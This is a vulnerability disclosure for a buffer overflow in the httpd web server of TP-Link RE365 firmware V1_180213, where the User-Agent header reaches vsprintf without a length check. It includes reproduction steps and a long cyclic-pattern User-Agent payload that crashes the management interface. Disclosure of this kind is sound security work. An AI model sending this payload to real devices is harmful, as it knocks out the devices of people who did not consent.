Vendor of the products: TP-Link
Vendor's website: http://www.tp-link.com
Reported by: Chen Xiao(2235254941@qq.com)
Affected products: TP-Link RE365 Routers
Affected firmware version: V1_180213
Firmware download address: TP-Link RE365
In the TP-Link RE365 V1_180213 series routers, there is a buffer overflow vulnerability due to the lack of length verification for the USER_AGENT
field in /usr/bin/httpd
. Attackers who successfully exploit this vulnerability can cause the remote target device to crash or execute arbitrary commands by sending a GET request with USER_AGENT
header filled with extremely long data.
In the httpRpmWmbParse
function of the /usr/bin/httpd
binary file, the content of the USER_AGENT
field is passed to the PRINTF_ECHO
function.
In the PRINTF_ECHO
function, the content of the USER_AGENT
field is concatenated into a format string via the vsprintf
function and stored in v3
.
It is evident that there is no check on the length of the user-controllable USER_AGENT
field, which poses a risk of buffer overflow vulnerability. By writing a large amount of data into the USER_AGENT
field, it will cause a denial of service (DoS) or execute arbitrary commands.
Send a GET request to the ip address of backend management system with a large amount of data written into the USER_AGENT
request header.
Mobile;aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj
Send a GET request using the HackBar and inject a large amount of data. The buffer overflow vulnerability will be triggered.
After the attack, a denial of service occurs, and the backend management system cannot be accessed.